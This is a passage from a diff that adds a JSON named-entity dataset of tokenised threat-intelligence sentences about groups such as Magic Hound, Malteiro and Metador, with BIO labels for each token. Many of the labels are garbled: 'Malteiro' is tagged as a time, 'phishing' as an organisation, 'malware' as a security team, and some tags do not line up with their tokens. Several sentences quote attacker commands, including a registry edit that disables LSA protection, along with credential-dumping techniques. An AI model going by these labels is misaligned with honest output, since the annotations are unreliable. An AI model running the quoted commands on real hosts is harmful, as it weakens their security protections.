"O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "a", + "web", + "shell", + "to", + "execute", + "`nltest", + "/trusted_domains`", + "to", + "identify", + "trust", + "relationships." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "registered", + "fraudulent", + "domains", + "such", + "as", + "\"mail-newyorker.com\"", + "and", + "\"news12.com.recover-session-service.site\"", + "to", + "target", + "specific", + "victims", + "with", + "phishing", + "attacks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "compromised", + "domains", + "to", + "host", + "links", + "targeted", + "to", + "specific", + "phishing", + "victims." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "conducted", + "watering-hole", + "attacks", + "through", + "media", + "and", + "magazine", + "websites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "Powershell", + "to", + "discover", + "email", + "accounts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "compromised", + "personal", + "email", + "accounts", + "through", + "the", + "use", + "of", + "legitimate", + "credentials", + "and", + "gathered", + "additional", + "victim", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "established", + "email", + "accounts", + "using", + "fake", + "personas", + "for", + "spearphishing", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "identified", + "high-value", + "email", + "accounts", + "in", + "academia,", + "journalism,", + "NGO's,", + "foreign", + "policy,", + "and", + "national", + "security", + "for", + "targeting." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Idus", + "B-Idus", + "B-OffAct", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "compromised", + "email", + "credentials", + "in", + "order", + "to", + "steal", + "sensitive", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "an", + "encrypted", + "http", + "proxy", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "used", + "base64-encoded", + "files", + "and", + "has", + "also", + "encrypted", + "embedded", + "strings", + "with", + "AES." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "the", + "Telegram", + "API", + "`sendMessage`", + "to", + "relay", + "data", + "on", + "compromised", + "devices." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "exploited", + "the", + "Log4j", + "utility", + "(CVE-2021-44228),", + "on-premises", + "MS", + "Exchange", + "servers", + "via", + "\"ProxyShell\"", + "(CVE-2021-34473,", + "CVE-2021-34523,", + "CVE-2021-31207),", + "and", + "Fortios", + "SSL", + "VPNs", + "(CVE-2018-13379)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "B-Features" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "deleted", + "and", + "overwrote", + "files", + "to", + "cover", + "tracks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "can", + "list", + "a", + "victim's", + "logical", + "drives", + "and", + "the", + "type,", + "as", + "well", + "the", + "total/free", + "space", + "of", + "the", + "fixed", + "devices.", + "Other", + "malware", + "can", + "list", + "a", + "directory's", + "contents." + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "acquired", + "mobile", + "phone", + "numbers", + "of", + "potential", + "targets,", + "possibly", + "for", + "mobile", + "malware", + "or", + "additional", + "phishing", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "a", + "function", + "to", + "determine", + "whether", + "the", + "C2", + "server", + "wishes", + "to", + "execute", + "the", + "newly", + "dropped", + "file", + "in", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "captured", + "the", + "IP", + "addresses", + "of", + "visitors", + "to", + "their", + "phishing", + "sites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "disabled", + "LSA", + "protection", + "on", + "compromised", + "hosts", + "using", + "`\"reg\"", + "add", + "HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA", + "/v", + "RunAsPPL", + "/t", + "REG_DWORD", + "/d", + "0", + "/f`." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "downloaded", + "additional", + "code", + "and", + "files", + "from", + "servers", + "onto", + "victims." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "conducted", + "a", + "network", + "call", + "out", + "to", + "a", + "specific", + "website", + "as", + "part", + "of", + "their", + "initial", + "discovery", + "activity." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "is", + "capable", + "of", + "keylogging." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "stolen", + "domain", + "credentials", + "by", + "dumping", + "LSASS", + "process", + "memory", + "using", + "Task", + "Manager,", + "comsvcs.dll,", + "and", + "from", + "a", + "Microsoft", + "Active", + "Directory", + "Domain", + "Controller", + "using", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "copied", + "tools", + "within", + "a", + "compromised", + "network", + "using", + "RDP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "created", + "local", + "accounts", + "named", + "`help`", + "and", + "`DefaultAccount`", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "collected", + ".PST", + "archives." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "opening", + "malicious", + "email", + "attachments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "opening", + "malicious", + "links", + "embedded", + "in", + "emails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "named", + "a", + "malicious", + "script", + "CacheTask.bat", + "to", + "mimic", + "a", + "legitimate", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "`dllhost.exe`", + "to", + "mask", + "Fast", + "Reverse", + "Proxy", + "(FRP)", + "and", + "`MicrosoftOutLookUpdater.exe`", + "for", + "Plink." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Tool", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "modified", + "Registry", + "settings", + "for", + "security", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "KPortScan", + "3.0", + "to", + "perform", + "SMB,", + "RDP,", + "and", + "LDAP", + "scanning." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "communicated", + "with", + "its", + "C2", + "server", + "over", + "TCP", + "ports", + "4443", + "and", + "10151", + "using", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "PowerShell", + "for", + "execution", + "and", + "privilege", + "escalation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "Plink", + "to", + "tunnel", + "RDP", + "over", + "SSH." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "Fast", + "Reverse", + "Proxy", + "(FRP)", + "for", + "RDP", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "used", + "Registry", + "Run", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "Remote", + "Desktop", + "Services", + "to", + "copy", + "tools", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "exported", + "emails", + "from", + "compromised", + "Exchange", + "servers", + "including", + "through", + "use", + "of", + "the", + "cmdlet", + "`New-MailboxExportRequest.`" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "Ping", + "for", + "discovery", + "on", + "targeted", + "networks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "MiniDump", + "from", + "comsvcs.dll", + "when", + "dumping", + "LSASS", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "scheduled", + "tasks", + "to", + "establish", + "persistence", + "and", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "can", + "take", + "a", + "screenshot", + "and", + "upload", + "the", + "file", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "created", + "fake", + "LinkedIn", + "and", + "other", + "social", + "media", + "accounts", + "to", + "contact", + "targets", + "and", + "convince", + "them--through", + "messages", + "and", + "voice", + "communications--to", + "open", + "malicious", + "links." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "captured", + "the", + "user-agent", + "strings", + "from", + "visitors", + "to", + "their", + "phishing", + "sites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "sent", + "malicious", + "URL", + "links", + "through", + "email", + "to", + "victims.", + "In", + "some", + "cases", + "the", + "URLs", + "were", + "shortened", + "or", + "linked", + "to", + "Word", + "documents", + "with", + "malicious", + "macros", + "that", + "executed", + "PowerShells", + "scripts", + "to", + "download", + "Pupy." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "SMS", + "and", + "email", + "messages", + "with", + "links", + "designed", + "to", + "steal", + "credentials", + "or", + "track", + "victims." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "used", + "various", + "social", + "media", + "channels", + "(such", + "as", + "LinkedIn)", + "as", + "well", + "as", + "messaging", + "services", + "(such", + "as", + "WhatsApp)", + "to", + "spearphish", + "victims." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "used", + "a", + "PowerShell", + "command", + "to", + "check", + "the", + "victim", + "system", + "architecture", + "to", + "determine", + "if", + "it", + "is", + "an", + "x64", + "machine.", + "Other", + "malware", + "has", + "obtained", + "the", + "OS", + "version,", + "UUID,", + "and", + "computer/host", + "name", + "to", + "send", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "gathers", + "the", + "victim's", + "local", + "IP", + "address,", + "MAC", + "address,", + "and", + "external", + "IP", + "address." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "quser.exe", + "to", + "identify", + "existing", + "RDP", + "connections." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "obtained", + "the", + "victim", + "username", + "and", + "sent", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "obtained", + "and", + "used", + "tools", + "like", + "Havij,", + "sqlmap,", + "Metasploit,", + "Mimikatz,", + "and", + "Plink." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "malware", + "has", + "used", + "VBS", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "conducted", + "widespread", + "scanning", + "to", + "identify", + "public-facing", + "systems", + "vulnerable", + "to", + "CVE-2021-44228", + "in", + "Log4j", + "and", + "ProxyShell", + "vulnerabilities;", + "CVE-2021-26855,", + "CVE-2021-26857,", + "CVE-2021-26858,", + "and", + "CVE-2021-27065", + "in", + "on-premises", + "MS", + "Exchange", + "Servers;", + "and", + "CVE-2018-13379", + "in", + "Fortinet", + "FortiOS", + "SSL", + "VPNs." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "acquired", + "Amazon", + "S3", + "buckets", + "to", + "use", + "in", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "multiple", + "web", + "shells", + "to", + "gain", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "collected", + "names", + "and", + "passwords", + "of", + "all", + "Wi-Fi", + "networks", + "to", + "which", + "a", + "device", + "has", + "previously", + "connected." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "the", + "command-line", + "interface", + "for", + "code", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Magic", + "Hound", + "has", + "used", + "a", + "tool", + "to", + "run", + "`cmd", + "/c", + "wmic", + "computersystem", + "get", + "domain`", + "for", + "discovery." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "obtained", + "credentials", + "from", + "mail", + "clients", + "via", + "NirSoft", + "MailPassView." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "stolen", + "credentials", + "stored", + "in", + "the", + "victim’s", + "browsers", + "via", + "software", + "tool", + "NirSoft", + "WebBrowserPassView." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "the", + "ability", + "to", + "deobfuscate", + "downloaded", + "files", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "injected", + "Mispadu’s", + "DLL", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "used", + "scripts", + "encoded", + "in", + "Base64", + "certificates", + "to", + "distribute", + "malware", + "to", + "victims." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "targets", + "organizations", + "in", + "a", + "wide", + "variety", + "of", + "sectors", + "via", + "the", + "use", + "of", + "Mispadu", + "banking", + "trojan", + "with", + "the", + "goal", + "of", + "financial", + "theft." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "relied", + "on", + "users", + "to", + "execute", + ".zip", + "file", + "attachments", + "containing", + "malicious", + "URLs." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "collects", + "the", + "installed", + "antivirus", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + ".zip", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "collects", + "the", + "machine", + "information,", + "system", + "architecture,", + "the", + "OS", + "version,", + "computer", + "name,", + "and", + "Windows", + "product", + "name." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malteiro", + "will", + "terminate", + "Mispadu's", + "infection", + "process", + "if", + "the", + "language", + "of", + "the", + "victim", + "machine", + "is", + "not", + "Spanish", + "or", + "Portuguese." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "Malteiro", + "has", + "utilized", + "a", + "dropper", + "containing", + "malicious", + "VBS", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "encrypted", + "their", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "quickly", + "deleted", + "`cbd.exe`", + "from", + "a", + "compromised", + "host", + "following", + "the", + "successful", + "deployment", + "of", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "downloaded", + "tools", + "and", + "malware", + "onto", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "used", + "unique", + "malware", + "in", + "their", + "operations,", + "including", + "metaMain", + "and", + "Mafalda." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Metador", + "has", + "used", + "TCP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "used", + "Microsoft's", + "Console", + "Debugger", + "in", + "some", + "of", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "used", + "the", + "Windows", + "command", + "line", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Metador", + "has", + "established", + "persistence", + "through", + "the", + "use", + "of", + "a", + "WMI", + "event", + "subscription", + "combined", + "with", + "unusual", + "living-off-the-land", + "binaries", + "such", + "as", + "`cdb.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Moafee", + "has", + "been", + "known", + "to", + "employ", + "binary", + "padding." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Mofang", + "has", + "compressed", + "the", + "ShimRat", + "executable", + "within", + "malicious", + "email", + "attachments.", + "Mofang", + "has", + "also", + "encrypted", + "payloads", + "before", + "they", + "are", + "downloaded", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mofang's", + "malicious", + "spearphishing", + "attachments", + "required", + "a", + "user", + "to", + "open", + "the", + "file", + "after", + "receiving." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mofang's", + "spearphishing", + "emails", + "required", + "a", + "user", + "to", + "click", + "the", + "link", + "to", + "connect", + "to", + "a", + "compromised", + "website." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mofang", + "delivered", + "spearphishing", + "emails", + "with", + "malicious", + "documents,", + "PDFs,", + "or", + "Excel", + "files", + "attached." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", 